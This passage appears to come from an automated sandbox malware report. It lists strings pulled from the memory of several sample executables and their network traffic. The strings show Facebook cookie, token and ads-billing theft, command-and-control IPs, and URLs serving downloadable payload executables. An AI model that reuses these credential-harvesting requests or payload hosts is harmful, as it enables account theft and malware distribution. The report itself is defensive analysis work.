22name%22%5D&filtering=%5B%5D&include_headers=false&limit=100&method=get&pretty=0&sort=name_ascending&suppress_http_code=1"business"businessdataaccount_ididhttps://business.facebook.com/ads/manager/account_settings/account_billing/?act=fb_account_id&pid=p1&business_id=fb_business_id&page=account_settings&tab=account_billing_settingsfb_account_idfb_business_idhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSpendLimitDataLoader&fields=%5B%22spend_cap%22%2C%22amount_spent%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1amount_spent"show_admined_pages":truehasHomePageadtrustratiohttps://www.facebook.com/adsmanager/creation?act=fb_idfb_id,:"account_currency_ratio_to_usd":"adtrust_dsl":timeline_chromehttps://www.facebook.com/profile.php?id=c_user&sk=friendshref="<>"_gs6"}"items":{"count"friendsNumapi/fbtime{"sid":0,"time":0,"rand_str":""}api/?sid=sid#IO$J2&89DFJ2^984%7FJfj<>asi?h3.728*fhastimerand_str89%3gj,IH@<F7>84|j5kl3;4y:jdFJOhf01(92)3&key=statushttps://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?loc=location&app=Staoism&payoutcents=0.08&ver=3.5&ip=iplocation7https://maper.info/X1qpthttp
      Source: jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmpString found in binary or memory: 9invalid stof argumentstof argument out of rangemap/set too longMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60http://ip-api.com/json/countryCodecountry_codeofen_placemac10isinstallisLogined33uidversionc_userjazoest=/login/device-based/login/"=""jazoest""lsd""uid""source"&lsd=&uid=&source=&next=https://www.facebook.com/login/device-based/login/cookieJsonhttps://www.facebook.com/ads/manager/account_settings/account_billingaccess_token:{accountID:{_/v9.0/actpayInfoaccountIdhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispatcher&fields=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_middle_of_local_entity_migration%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1un_pwdfb_uidfb_access_tokencan_pay_nowhttps://graph.facebook.com/v9.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%22%2C%22account_status%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22viewable_business%7Bid%2Cname%7D%22%2C%22name%22%5D&filtering=%5B%5D&include_headers=false&limit=100&method=get&pretty=0&sort=name_ascending&suppress_http_code=1"business"businessdataaccount_ididhttps://business.facebook.com/ads/manager/account_settings/account_billing/?act=fb_account_id&pid=p1&business_id=fb_business_id&page=account_settings&tab=account_billing_settingsfb_account_idfb_business_idhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSpendLimitDataLoader&fields=%5B%22spend_cap%22%2C%22amount_spent%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1amount_spent"show_admined_pages":truehasHomePageadtrustratiohttps://www.facebook.com/adsmanager/creation?act=fb_idfb_id,:"account_currency_ratio_to_usd":"adtrust_dsl":timeline_chromehttps://www.facebook.com/profile.php?id=c_user&sk=friendshref="<>"_gs6"}"items":{"count"friendsNumapi/fbtime{"sid":0,"time":0,"rand_str":""}api/?sid=sid#IO$J2&89DFJ2^984%7FJfj<>asi?h3.728*fhastimerand_str89%3gj,IH@<F7>84|j5kl3;4y:jdFJOhf01(92)3&key=statushttps://script.google.com/macros/s/A
      Source: yevbZfdCqR.exe, 00000001.00000003.654242726.0000000005DE1000.00000004.00000001.sdmpString found in binary or memory: @invalid stof argumentstof argument out of rangemap/set too longMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60http://ip-api.com/json/countryCodecountry_codeofen_placemac10isinstallisLogined33uidversionc_userjazoest=/login/device-based/login/"=""jazoest""lsd""uid""source"&lsd=&uid=&source=&next=https://www.facebook.com/login/device-based/login/cookieJsonhttps://www.facebook.com/ads/manager/account_settings/account_billingaccess_token:{accountID:{_/v9.0/actpayInfoaccountIdhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispatcher&fields=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_middle_of_local_entity_migration%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1un_pwdfb_uidfb_access_tokencan_pay_nowhttps://graph.facebook.com/v9.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%22%2C%22account_status%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22viewable_business%7Bid%2Cname%7D%22%2C%22name%22%5D&filtering=%5B%5D&include_headers=false&limit=100&method=get&pretty=0&sort=name_ascending&suppress_http_code=1"business"businessdataaccount_ididhttps://business.facebook.com/ads/manager/account_settings/account_billing/?act=fb_account_id&pid=p1&business_id=fb_business_id&page=account_settings&tab=account_billing_settingsfb_account_idfb_business_idhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSpendLimitDataLoader&fields=%5B%22spend_cap%22%2C%22amount_spent%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1amount_spent"show_admined_pages":truehasHomePageadtrustratiohttps://www.facebook.com/adsmanager/creation?act=fb_idfb_id,:"account_currency_ratio_to_usd":"adtrust_dsl":timeline_chromehttps://www.facebook.com/profile.php?id=c_user&sk=friendshref="<>"_gs6"}"items":{"count"friendsNumapi/fbtime{"sid":0,"time":0,"rand_str":""}api/?sid=sid#IO$J2&89DFJ2^984%7FJfj<>asi?h3.728*fhastimerand_str89%3gj,IH@<F7>84|j5kl3;4y:jdFJOhf01(92)3&key=statushttps://script.google.com/macros/s/A
      Source: jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: iostreambad castbad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setinvalid stoi argumentstoi argument out of rangeUseJu47egg whatppphatOjk4ehg riwjgHgegUse whatppphatN5Vb3euig riwjg^(([^:\/?#]+):)?(//([^\/?#:]*)(:([^\/?#]*))?)?([^?#]*)(\?([^#]*))?(#(.*))?MalformedHh6e4sgg urlStrYkeI3hBGgErrorJhg4eu (WinHttpOpenNm4eg)ErrorOj7g4he (WinHttpGetProxyForUrlTh7e4gh)Error (WinHttpGetProxyForUrl)httphttpsUnknownNsV6e4hg schemeBe7n4us ErrorBjhe4hg (WinHttpConnectLj6e3hgg)?ErrorS7je4hg (WinHttpOpenRequestP6je4hg)ErrorHf74ge7g (WinHttpSendRequestVe7j4gi)ErrorJh7b4egg (WinHttpSendRequestPke4jhg)ErrorKj7e4hg (WinHttpReceiveResponseCeheg34g)ErrorTjr57eh (WinHttpQueryDataAvailableAe7hj4g)ErrorUj7e4hg (WinHttpReadDataPjke4hg)ErrorGh7e4hg (WinHttpSetCredentialsHe7j4hg)ErrorPj7e4hg (WinHttpQueryHeadersYg8e5gg)ErrorJh7eg4g (WinHttpQueryAuthSchemesYe6hg4)POSTGETlogin/device-based/loginContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9viewport-width: 1920Sec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Referer: https://www.facebook.com/Origin: https://www.facebook.comSec-Fetch-Dest: documentUpgrade-Insecure-Requests: 1/adsmanager/creation?act=/ads/manager/account_settings/account_billingSec-Fetch-Site: noneAccept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1v9.0/act_Accept: */*Content-type: application/x-www-form-urlencodedSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-sitemanager/account_settings/account_billingprimary_location/infoprofile.phppages/?category=your_pageshttps://www.facebook.com/error_selfError (WinHttpSetOption)Error (WinHttpAddRequestHeaders)vector too longinvalid string positionvector<bool> too longalnumalnumalphaalphablankblankcntrlcntrldddigitdigitgraphgraphlowerlowerprintprintpunctpunctspacespacessupperupperwwxdigitxdigit equals www.facebook.com (Facebook)
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1034493046.00000000017AC000.00000004.00000001.sdmpString found in binary or memory: _kr",1,"__markup_9f5fac15_0_0_Pq"],["__elem_a588f507_0_7_m9","u_0_o_IV",1,"__markup_9f5fac15_0_0_Pq"],["__elem_45d73b5d_0_2_to","u_0_p_ps",1,"__markup_9f5fac15_0_0_Pq"]],"require":[["ServiceWorkerLoginAndLogout","login",[],[]],["ScriptPath","set",[],["XIndexReduxController","a1f3c513",{"imp_id":"0uzjV8ug6tmR1aK09","ef_page":null,"uri":"https:\/\/www.facebook.com\/"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_58"],[{"__m":"__elem_a588f507_0_0_58"}]],["AccessibilityWebVirtualCursorClickLogger","init",["__elem_a588f507_0_0_58"],[[{"__m":"__elem_a588f507_0_0_58"}]]],["KeyboardActiv equals www.facebook.com (Facebook)
      Source: md8_8eus.exe, 00000023.00000002.964257095.0000000000509000.00000004.00020000.sdmpString found in binary or memory: a@OFDroid1FFDroiderhttps://www.facebook.comSoftware\ffdroiderall_accounts_table_account_id_celltext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3?act=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36www.facebook.comhttps://www.facebook.com/ads/manager/accounts?_fb_noscript=1 equals www.facebook.com (Facebook)
      Source: jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmpString found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://www.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;en_US&quot;, &quot;de_DE&quot;, &quot;https:\/\/www.facebook.com\/&quot;, &quot;www_list_selector&quot;, 1); return false;" title="English (US)">English (US)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;de_DE&quot;, &quot;https:\/\/it-it.facebook.com\/&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;de_DE&quot;, &quot;https:\/\/pt-pt.facebook.com\/&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Portuguese (Portugal)">Portugu equals www.facebook.com (Facebook)
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1034493046.00000000017AC000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c; equals www.facebook.com (Facebook)
      Source: md8_8eus.exe, 00000023.00000002.964257095.0000000000509000.00000004.00020000.sdmpString found in binary or memory: https://www.facebook.com equals www.facebook.com (Facebook)
      Source: yevbZfdCqR.exe, 00000001.00000003.654242726.0000000005DE1000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmpString found in binary or memory: https://www.facebook.com/adsmanager/creation?act=fb_id equals www.facebook.com (Facebook)
      Source: md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmpString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
      Source: md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmpString found in binary or memory: https://www.facebook.com/pages/?category=your_pages&ref=bookmarks equals www.facebook.com (Facebook)
      Source: yevbZfdCqR.exe, 00000001.00000003.654242726.0000000005DE1000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmpString found in binary or memory: https://www.facebook.com/profile.php?id=c_user&sk=friends equals www.facebook.com (Facebook)
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmpString found in binary or memory: invalid stof argumentstof argument out of rangemap/set too longMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60http://ip-api.com/json/countryCodecountry_codeofen_placemac10isinstallisLogined33uidversionc_userjazoest=/login/device-based/login/"=""jazoest""lsd""uid""source"&lsd=&uid=&source=&next=https://www.facebook.com/login/device-based/login/cookieJsonhttps://www.facebook.com/ads/manager/account_settings/account_billingaccess_token:{accountID:{_/v9.0/actpayInfoaccountIdhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispatcher&fields=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_middle_of_local_entity_migration%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1un_pwdfb_uidfb_access_tokencan_pay_nowhttps://graph.facebook.com/v9.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%22%2C%22account_status%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22viewable_business%7Bid%2Cname%7D%22%2C%22name%22%5D&filtering=%5B%5D&include_headers=false&limit=100&method=get&pretty=0&sort=name_ascending&suppress_http_code=1"business"businessdataaccount_ididhttps://business.facebook.com/ads/manager/account_settings/account_billing/?act=fb_account_id&pid=p1&business_id=fb_business_id&page=account_settings&tab=account_billing_settingsfb_account_idfb_business_idhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSpendLimitDataLoader&fields=%5B%22spend_cap%22%2C%22amount_spent%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1amount_spent"show_admined_pages":truehasHomePageadtrustratiohttps://www.facebook.com/adsmanager/creation?act=fb_idfb_id,:"account_currency_ratio_to_usd":"adtrust_dsl":timeline_chromehttps://www.facebook.com/profile.php?id=c_user&sk=friendshref="<>"_gs6"}"items":{"count"friendsNumapi/fbtime{"sid":0,"time":0,"rand_str":""}api/?sid=sid#IO$J2&89DFJ2^984%7FJfj<>asi?h3.728*fhastimerand_str89%3gj,IH@<F7>84|j5kl3;4y:jdFJOhf01(92)3&key=statushttps://script.google.com/macros/s/AK
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmpString found in binary or memory: k.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c; equals www.facebook.com (Facebook)
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmpString found in binary or memory: k.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;X-XSS-Protection0X-Content-Type-Optionsnosniffx-fb-rlafr0Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveWed, 23 Jun 2021 20:23:03 GMTDateProxy-Connectionkeep-aliveConnectionprivate, no-cache, no-store, must-revalidateCache-Control equals www.facebook.com (Facebook)
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.745997863.00000000017AB000.00000004.00000001.sdmpString found in binary or memory: m_8h",1,"__markup_9f5fac15_0_0_Pq"],["__elem_a588f507_0_6_Az","u_0_n_kr",1,"__markup_9f5fac15_0_0_Pq"],["__elem_a588f507_0_7_m9","u_0_o_IV",1,"__markup_9f5fac15_0_0_Pq"],["__elem_45d73b5d_0_2_to","u_0_p_ps",1,"__markup_9f5fac15_0_0_Pq"]],"require":[["ServiceWorkerLoginAndLogout","login",[],[]],["ScriptPath","set",[],["XIndexReduxController","a1f3c513",{"imp_id":"0uzjV8ug6tmR1aK09","ef_page":null,"uri":"https:\/\/www.facebook.com\/"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_58"],[{"__m":"__elem_a588f507_0_0_58"}]],["AccessibilityWebVirtualCursorClickLogger","init",["__elem_a588f507_0_0_58"],[[{"__m":"__elem_a588f507_0_0_58"}]]],["KeyboardActiv equals www.facebook.com (Facebook)
      Source: jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmpString found in binary or memory: re</a></li><li><a href="/policies/cookies/" title="Erfahre mehr &#xfc;ber Cookies und Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Erfahre mehr &#xfc;ber Datenschutzinfo.">Datenschutzinfo<i class="img sp__Hy_fSSiKVF sx_44b62b"></i></a></li><li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Unsere Nutzungsbedingungen und Richtlinien.">Nutzungsbedingungen</a></li><li><a href="/help/?ref=pf" accesskey="0" title="Besuche unseren Hilfebereich.">Hilfe</a></li><li><a accesskey="6" class="accessible_elem" href="/settings" title="Facebook-Einstellungen ansehen und bearbeiten.">Einstellungen</a></li><li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="Aktivit&#xe4;tenprotokoll anzeigen">Aktivit equals www.facebook.com (Facebook)
      Source: md8_8eus.exe, 00000023.00000002.964257095.0000000000509000.00000004.00020000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
      Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
      Source: unknownHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Jun 2021 20:22:15 GMTServer: Apache/2.4.41 (Ubuntu)Content-Type: text/html; charset=iso-8859-1
      Source: md8_8eus.exe, 00000023.00000002.964257095.0000000000509000.00000004.00020000.sdmpString found in binary or memory: http://101.36.107.74/seemorebty/
      Source: md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmpString found in binary or memory: http://111.90.14facebook
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/
      Source: yevbZfdCqR.exe, 00000001.00000003.650721948.0000000004F72000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file1.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file1.exe1
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file1.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000003.650721948.0000000004F72000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file1.exeuments
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file2.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file2.exe/
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file2.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file2.exem
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file2.exep
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file4.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file4.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file4.exeG
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file4.exehttp://136.144.41.133/WW/file5.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file5.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file5.exe;
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file5.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file6.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file6.exe#
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file6.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file6.exehttp://136.144.41.133/WW/file7.exe
      Source: yevbZfdCqR.exe, 00000001.00000003.650285790.0000000004F72000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file7.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file7.exe152/:
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file7.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000003.650285790.0000000004F72000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file7.exeumentsN13eHI1fs1RwfU6rt0L4y8dk.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file8.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file8.exe152/
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file8.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file8.exeW
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file9.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file9.exe152/
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file9.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.749565925.0000000000F3A000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.749686234.0000000000F76000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/server.txt
      Source: yevbZfdCqR.exe, 00000001.00000002.749565925.0000000000F3A000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/server.txtB
